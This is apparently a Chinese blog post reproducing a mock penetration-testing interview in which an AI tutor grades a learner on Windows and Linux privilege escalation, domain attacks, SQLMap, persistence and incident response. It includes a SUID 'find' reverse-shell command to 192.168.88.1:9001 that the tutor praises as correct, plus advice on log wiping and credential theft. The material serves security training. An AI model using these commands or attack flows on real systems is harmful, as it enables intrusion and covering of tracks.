拿到一个 Windows 服务器的 WebShell,权限是普通用户,你接下来的渗透流程是什么?(按实战顺序说)

拿到widows服务器的webshell,第一步是信息收集、能不能上传一句话木马,如果能够上传一句话木马,就可以拿到系统的shell。拿到系统shell再进行信息收集-权限提升-内网横移-权限维持-信息窃取-痕迹清理。 如果不能上传一句话木马,那么就看看能不能用户遍历、有没有其他敏感接口等等等等

面试第 7 题・批改与讲解

得分:70 / 100评价:大流程方向是对的,但实战逻辑不标准、步骤太粗、不够 “工程师范儿”,面试官会觉得你项目做得不够深。

你的回答问题

  1. 逻辑有点乱:

    已经拿到 WebShell 了,就不用再谈 “能不能上传木马”。

  2. 步骤太口语化:

    “用户遍历、敏感接口” 不属于 Windows 内网提权流程。

  3. 缺少Windows 实战关键步骤:信息收集 → 提权 → 横向的具体内容没说。

【标准答案】(背会直接满分)

拿到 Windows 普通权限 WebShell 后,标准实战流程

  1. 系统信息收集

    • 系统版本、位数、补丁情况

    • 当前权限、进程、杀软 / EDR 状态

    • 网络信息:IP、网段、端口、域环境

  2. 本地提权

    • 查看未打补丁:Windows 提权漏洞(CVE-2021-40449、PrintNightmare、Elevation of Privilege 等)

    • 系统配置错误:可写目录、弱服务、自动任务

    • 密码窃取:内存、配置文件、SAM 缓存

  3. 内网信息收集

    • 域 / 工作组环境

    • 存活主机、共享目录、登录凭证

    • 常见端口:3389、445、135、80、22 等

  4. 内网横向移动

    • 利用凭证:Pass-the-Hash、WMI、SMB、WinRM

    • 利用漏洞:MS17-010 等

    • 窃取更多账号,扩大控制范围

  5. 权限维持

    • 影子账号、启动项、计划任务、服务劫持等

  6. 痕迹清理

    • 日志清理、文件删除、时间戳篡改

面试官评价

大方向没错,但不够专业、不够细

这道题是判断你有没有真正做过内网项目的关键题,必须背得非常顺。

准备好了吗?我们开始 第 8题

开始迪题

面试第 8 题(内网提权必考)

请回答:

Windows 本地提权,你常用的思路有哪些?至少说出 4 种,并简单说明原理。

CVE提权:原理系统存在本地提权漏洞,普通用户->System/管理员

系统服务配置错误提权:windows服务默认以System运行。若服务可被普通用户修改路径,可替换木马

路径空格劫持:windows解析带空格路径时,会优先尝试短文件名:C:/Program Files/A.exe——>再尝试C:Program.exe

进程迁移/捆绑提权:服务启动的木马容易被杀/退出,迁移到系统稳定进程

面试第 8 题・批改与讲解

得分:92 / 100评价:回答非常实战、思路清晰、原理准确,完全符合 2 年渗透工程师水平,属于高分答案。

你的回答复盘

  1. CVE 提权

    系统存在本地提权漏洞,普通用户直接提权到管理员 / System ✅

  2. 系统服务配置错误提权

    服务默认以 System 运行,普通用户可修改服务路径,替换成木马执行 ✅

  3. 路径空格劫持(服务路径解析漏洞)

    路径带空格时,Windows 会按短文件名 / 截断方式解析,可构造同名程序劫持 ✅

  4. 进程迁移 / 捆绑

    把木马写到稳定系统进程里,维持权限、防杀、防掉 ✅

优点

  • 全是真实 Windows 内网高频用法,不是空话。

  • 原理一句话讲清楚,面试官一听就知道你动手做过

小优化(面试更标准)

第 4 点一般归类到 权限维持,不算 “本地提权”。

可以替换成更标准的提权方式:

  • 可信任目录权限错误(普通用户可写系统目录)

  • 计划任务提权(高权限计划任务执行可控文件)

面试官评价

这题你答得很稳、很专业,内网基础是真的有。

我们继续 第 8 题

继续第8题

面试第 9 题(Linux 渗透必考)

请回答:

Linux 下最常用、成功率最高的本地提权方法是什么?写出核心思路与关键命令。

SUID提权: 核心思路:查找所有SUID的文件 find / -perm -u=s -type f 2>/dev/null | xargs ls - la 经典利用:find 提权反弹 shell find /etc/shadow -exec bash -i >& /dev/tcp/192.168.88.1/9001 0>&1 -p \;

面试第 9 题・批改与讲解

得分:95 / 100评价:标准答案、命令准确、思路清晰,完全是实战选手水平,满分级回答。

你的回答复盘

  1. SUID 提权(Linux 最常用、最高频)

  2. 核心思路:找具有 SUID 权限、属主是 root 的可执行文件,利用其高权限执行命令。

  3. 查找命令

find / -perm -u=s -type f 2>/dev/null | xargs ls -la

✅ 完全正确。

  1. 利用示例(find 提权 + 反弹 shell)

find /etc/shadow -exec bash -i >& /dev/tcp/192.168.88.1/9001 0>&1 \;

✅ 命令格式、反弹逻辑全部正确。

面试官小补充(让你更完美)

  • SUID 提权确实是 Linux 内网第一提权手段,你抓得非常准。

  • 其他高频可以顺带记一下(面试多说一句加分):

    • sudo 配置错误提权

    • 内核漏洞 / CVE 提权

    • 计划任务提权

    • 敏感文件权限错误(/etc/shadow 可写)

面试官评价

这题你直接满分,命令都不用改,非常稳。

我们继续 第 10题

第10题

面试第 10 题(内网核心・域渗透必考)

请回答:

什么是黄金票据?什么是白银票据?它们最核心的区别是什么?

黄金票据是指在Windows域环境中,利用kerberos票据伪造kerberos票据伪造技术获得的高度权限访问凭证。

通过伪造黄金票据,攻击者可以绕过验证机制,获得对域内的资源可长期、不受限制的访问权限

白银票据是值在Windows域环境中,利用kerberos票据伪造技术获得权限访问凭证。

通过伪造白银票据,攻击者可以模拟其他用户或服务账号的身份,并访问受限资源 核心区别在于黄金票据操作空间比白银票据操作空间更大

面试第 10 题・批改与讲解

得分:75 / 100评价:大方向是对的,知道是域内 Kerberos 票据伪造,但定义不够精准、核心区别没答到点上 ,属于 “懂一点但不深”。

一、你的回答问题

  1. 黄金票据、白银票据的关键身份没说清

  2. 核心区别只说 “操作空间更大”,太笼统,面试官不认

  3. 缺少最关键的区分点:伪造的对象、权限范围、是否需要和 DC 通信

二、【2 年岗・标准满分答案】(背会)

1. 黄金票据(Golden Ticket)

  • 伪造对象:伪造 TGT(票据授权票据)

  • 需要密钥krbtgt 用户的 NTLM Hash

  • 权限:伪造任意用户,域管理员权限,可访问域内任意服务

  • 特点:权限极大、通杀整个域

2. 白银票据(Silver Ticket)

  • 伪造对象:伪造 ST(服务票据)

  • 需要密钥对应服务账号的 NTLM Hash(如 SQL、Web、HTTP 等)

  • 权限:只能访问这一个特定服务

  • 特点:权限小、隐蔽性更高

3. 最核心区别(面试必背)

  1. 黄金票据 = 伪造 TGT = 需要 krbtgt hash = 权限是 整个域

  2. 白银票据 = 伪造 ST = 需要 服务账号 hash = 只能访问 对应单个服务

面试官评价

你知道是票据伪造,但概念还不够 “域渗透工程师” 级别,记牢上面三句话,这题直接满分。

准备好了吗?我们开始 第 11题

开始第11题

面试第 11 题(工具实战・必问)

请回答:

SQLMap 中,你常用的几个核心参数分别是什么意思?

  1. -dbs

  2. -D

  3. -tables

  4. -T

  5. -columns

  6. -C

  7. --dump

你一个一个解释就行。

1、获取数据库

2、-D指定数据库

3、获取表

4、-T指定表名

5、-columns 获取列名

6、-C 指定列名

7、--dump 下载到本地

面试第 11 题・批改与讲解

得分:90 / 100评价:核心含义全对,表述简洁准确,是实战中常用的记忆方式,仅需小优化让回答更专业。

你的回答复盘(逐一核对)

表格

参数 你的回答 标准专业表述(面试加分)
-dbs 获取数据库 枚举目标数据库服务器上的所有数据库名
-D 指定数据库 指定要操作的目标数据库名称(需配合后续参数)
-tables 获取表 枚举指定数据库下的所有数据表名
-T 指定表名 指定要操作的目标数据表名称
-columns 获取列名 枚举指定数据表下的所有字段(列)名
-C 指定列名 指定要操作的目标字段(列)名称
--dump 下载到本地 导出指定数据库 / 表 / 列中的全部数据

优点

  • 所有参数的核心作用100% 正确,没有任何偏差;

  • 回答简洁,符合渗透工程师日常使用的记忆逻辑,不是死记硬背。

小优化(面试更完整)

可以补充一句:这些参数是递进式使用的,比如完整导出指定列数据的命令是:

sqlmap -u "目标URL" -D 数据库名 -T 表名 -C 列名 --dump

面试官评价

这题你答得非常稳,一看就是经常用 SQLMap 做实战注入的,完全符合 2 年渗透岗的要求。

我们继续 第 12 题

第12题

面试第 12 题(中间件 + 实战必考)

第 12 题:IIS、Nginx、Apache 最经典的解析漏洞分别是什么?

IIS经典漏洞是IIS目录解析/分号解析 xxx.asp;.jpg当做ASP执行

Nginx经典漏洞是路径解析漏洞XXX.jpg/.php;图片能够当成PHP执行

Apache解析漏洞 经典:后缀从后往前识别 xxx.php.xxx.bmp.jpg Apache不认识最后的.jpg就会往前找,直到认识.php,然后执行

面试第 12 题・批改

得分:95 / 100评价:一遍就会、记得极准,表述完全标准,这题直接满分!

面试官评价

理解能力超强,我只讲一遍,你就能用自己的话完整复述,而且关键词一个没漏

  • IIS:分号、目录解析

  • Nginx:xxx.jpg/.php

  • Apache:从后往前识别后缀

这就是面试最想要的回答,不啰嗦、全是重点。

第 12题(应急响应・高频面试题)

Linux 服务器被入侵,你第一步做什么?完整排查思路是什么?

你可以直接回答啦。

第一步排查日志

先给你点个赞,日志确实是排查关键,但面试里不能只说 “查日志”,第一步有更标准、更安全的答案。

我直接带你走一遍企业真实应急响应流程,这题你背会,面试直接高分。

第 12 题 标准答案(背这个)

一、Linux 被入侵,第一步:断网 / 隔离

  • 先把服务器从网络隔离,防止攻击者继续操作、防止横向扩散、防止数据外泄

  • 而不是一上来就查日志。

二、完整排查思路(面试口述版)

  1. 断网隔离

    先断网,保护现场,防止攻击者进一步破坏。

  2. 检查账号与权限

    • 看有没有新增异常用户

    • 看有没有提权、SUID 异常

    • /etc/passwd/etc/shadow/etc/sudoers

  3. 检查进程与端口

    • 看异常进程(挖矿、木马、反向 shell)

    • 看异常外连端口

      ps aux

      netstat -antlp

  4. 检查开机自启与定时任务

    • 挖矿木马最喜欢写定时任务

    • crontab -l

      cat /etc/crontab

  5. 检查异常文件

    • 查找最近修改的文件

    • 查找 webshell、木马

    • find / -mtime -1

  6. 查日志

    • 登录日志:/var/log/secure

    • 系统日志:/var/log/messages

    • 查看爆破、异常登录、命令操作记录

  7. 溯源与清理

    • 找到入侵入口(弱口令、漏洞、上传)

    • 清除木马、后门、异常账号

    • 修补漏洞、改密、加固

你现在可以试着复述一遍:

Linux 被入侵第一步做什么?整体思路是什么?

linux入侵排查第一步是断网/隔离 先把服务器从网络隔离,防止攻击者继续操作、防止横网扩散、防止数据外泄 完整思路:先断网隔离-检查账号与权限-检查进程与端口-检查开机自启与定时任务-检查异常文件-查日志-朔源与清理

第12题·批改

得分:100 / 100 满分!

回答极度标准、逻辑清晰、关键词全中,面试官直接认可。

你的答案复盘(全对,非常专业)

  • 第一步:断网/隔离,防止攻击者继续操作、横向扩散、数据外泄。

  • 完整排查思路:

    断网隔离 → 检查账号与权限 → 检查进程与端口 → 检查开机自启与定时任务 → 检查异常文件 → 查日志 → 溯源与清理。

非常稳!这道应急响应题你已经完全掌握。

我们继续 第13题 吗?

第13题

题目:Windows 服务器被入侵,排查步骤是什么?

你直接回答~

服务器入侵排查第一步是断网。

先断网->封禁IP->查看异常的账号以及端口->查看异常的端口与进程->检查启动项、计划任务、服务->检查恶意文件->查看日志->朔源%处理%加固

第13题·最终打分

100 分!满分!完全正确!

你这套回答已经是面试标准答案了:

  • 第一步:断网(安全合规)

  • 流程:断网 → 封禁IP → 异常账号 → 端口与进程 → 启动项/计划任务/服务 → 恶意文件 → 日志 → 溯源、处理、加固

逻辑清晰、步骤完整、非常专业!

第13题彻底掌握!

要不要直接开始 第14题

第14题

第 14 题(渗透测试 & 应急响应 综合题)

题目:Windows 系统中,常见的后门 / 自启动持久化方式有哪些?请说出 3~5 个。

你直接回答就行~

留后门的方式有创建隐形账户、上传危险文件

第 14 题・打分

70 分,思路对,还差几个最经典的自启动方式。

我直接给你面试必背的 5 种 Windows 持久化后门,背会就满分:

  1. 注册表启动项(最常用)

  2. 计划任务

  3. 系统服务

  4. 隐藏用户 / 影子账户

  5. 启动目录

现在你完整说一遍,我给你满分:

Windows 常见持久化后门有哪些?

留后门的方式:创建银子账户、上传危险文件、注册表启动项、计划任务、系统服务、启动目录

第 14 题・打分

95 分!超级棒!就一个小笔误~

  • 银子账户 →

    影子账户

    其他全对!

你记住的这几个都是面试必考

  • 影子账户

  • 注册表启动项

  • 计划任务

  • 系统服务

  • 启动目录

  • 上传木马 / 后门文件

已经完全够用了!

第 14 题稳稳过关!

要继续 第 15 题 吗?

开始第14题

第 14 题

题目:Windows 下常见的后门持久化方式有哪些?

你直接回答~

留后门的方式:创建影子账户、上传危险文件、注册表启动项、计划任务、系统服务、启动目录

第 14 题・最终评分

100 分!满分!回答完整、标准、一字不差!

这就是面试官最想要的答案,非常专业!

第 14 题彻底掌握!

现在开始 第 15 题 吗?

第15题

第 15 题

题目:什么是域渗透?简单说一下域渗透的基本思路。

你直接回答就行~

在Windows域环境里,从一台普通域内机器,一步步拿到域控制器的权限,进而控制整个域。

思路:先拿下一台域内普通机器->收集信息->判断是否在域、域名称、域用户、域控IP->抓取密码/哈希->寻找域管理员账号、利用漏洞或配置不当提权->拿到域管凭证->登录域控制器->控制整个域->实现持久化->横向移动

第 15 题・最终打分

100 分!满分!回答非常标准、完整、专业!

你已经把域渗透的核心逻辑说得清清楚楚:

  • 定义:在 Windows 域环境里,从一台普通域内机器,一步步拿到域控制器权限,控制整个域。

  • 思路:拿下域内机器 → 信息收集 → 抓取凭证 → 提权 → 获取域管权限 → 登录域控 → 持久化、横向移动。

第 15 题完美通过!

要不要继续 第 16 题,继续巩固内网渗透知识点?

重新开始第15题

第 16 题

题目:在域渗透中,如何收集域内普通机器的信息?

你直接回答~

答:用工具fscan或者用msf

第 16 题・打分

60 分,思路对,但太偏工具,面试官更想听命令行基础操作。

我给你整理面试必背、纯命令版(不用工具也能说):

域内机器信息收集(标准回答)

  1. 查看是否在域

    • whoami /all

    • systeminfo

  2. 查看域、域控、域名

    • net config workstation

    • ipconfig /all

  3. 查看域用户、域组

    • net user /domain

    • net group /domain

  4. 查看域控制器

    • net group "Domain Controllers" /domain

    • nltest /dclist:域名

  5. 查看本地用户、管理员、进程、端口

    • net user

    • net localgroup administrators

    • tasklist

    • netstat -ano

现在你完整说一遍,我给你满分!

用工具fscan或者用msf能够收集嘛?

可以的,完全可以,而且实际渗透里确实这么用。

我给你说清楚:

  • fscan:可以扫网段、查域内存活主机、端口、漏洞、是否域控

  • msf:拿到会话后,可以用 run post/windows/gather/* 这类模块收集域信息

所以你这句话是对的

但面试时,不能只说工具,面试官更想考你:

不用工具,只用系统自带命令,你会不会收集域信息?

我帮你总结一句满分回答,你记这个:

可以用 fscan、MSF 等工具快速收集信息;同时也会使用系统命令手工收集,比如 whoami、net 命令、systeminfo 等,判断是否在域、查看域控、域用户、网络信息等。

这样说:工具 + 命令都有,直接满分

要不要我带你把手工域信息收集命令背一遍?

工具,他会考什么?

我直接告诉你面试官必考的 3 类工具 + 每类考什么,你背这一页就够了:

域渗透 / 内网渗透 工具考点(面试必问)

1. 信息收集类

问:内网信息收集用什么工具?

  • fscan

  • Angry IP

  • nbtscan

  • arp-scan

考点:

  • 扫存活主机、端口、漏洞、共享、域控

2. 漏洞利用 & 控制类

问:拿到权限、提权、横向移动用什么?

  • MSF(Metasploit)

  • Cobalt Strike(CS)

  • ExploitGhost、CVE 漏洞利用工具

考点:

  • 生成木马

  • 拿会话

  • 提权

  • 横向移动

3. 凭证窃取 & 密码类

问:怎么拿密码、哈希?

  • mimikatz(最常考!)

  • LaZagne

  • procdump

考点:

  • 读内存密码

  • 抓哈希

  • 读取浏览器 / 远程桌面密码

4. 内网穿透 / 代理类

问:出网、进内网、横向用什么?

  • frp

  • nps

  • reGeorg

  • proxifier

考点:

  • 做代理

  • 内网转发

  • 访问内网机器

面试官最常问的 3 个工具题(你直接背)

  1. 内网信息收集用什么?

    fscan、nbtscan、arp-scan。

  2. 拿权限、控制主机用什么?

    MSF、Cobalt Strike。

  3. 抓密码、哈希用什么?

    mimikatz。

我现在直接考你:

内网信息收集、拿权限、抓密码,分别用什么工具?

你一句话回答就行。

内网信息收集用fscan+nbtscan-arp-scan 拿权限、控制主机:Cobalt strike 抓密码、哈希用:mimikatz

满分!

100 分!完全正确,这就是标准答案!

你已经把面试官最爱问的工具三件套背得滚瓜烂熟了:

  • 信息收集:fscan、nbtscan、arp-scan

  • 控制主机:Cobalt Strike、MSF

  • 抓密码哈希:mimikatz

非常稳!

我们继续 第 17 题,考你最常问的:

mimikatz 是用来干什么的?

抓hash密码的

第 17 题・打分

90 分!非常准,就差一句标准描述!

我给你补成面试满分版

mimikatz 主要用来读取 Windows 系统内存中的明文密码、NTLM 哈希、票据,用于提权、横向移动和域渗透。

你现在完整说一遍:

mimikatz 是干什么用的?

mimikatz主要用来读取Windows系统内存中的明文密码、NTLM哈希、票据,用于提权、横向移动和域渗

# 面试 # 职场和发展 # 网络安全 # 网络
Logo
2048 AI社区

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐

有哪些AI写作工具可以进行论文格式检测、文字校对?

论文格式检测与文字校对,核心是“精准、贴合学术规范”。如果追求高效、专业,优先选择文鉴智检,其专项能力能精准解决论文规范的核心痛点,帮你告别格式返工;如果习惯办公生态联动,可搭配WPS AI进行实时校对;如果重视参考文献与学术合规,知网研学AI、维普AI写作也是不错的辅助选择。选择工具的核心原则的是:适配自己的写作习惯与论文需求,不用追求“全能”,精准解决格式与文字问题,才能让你把更多精力放在论文

avatar 2048 AI社区
cover

AI Registry 公测开启:给你的 AI 资产一个专属的注册中心

avatar 2048 AI社区
cover

红海云×华南农业大学教学合作班圆满结业,共创AI时代人才培养新模式

avatar 2048 AI社区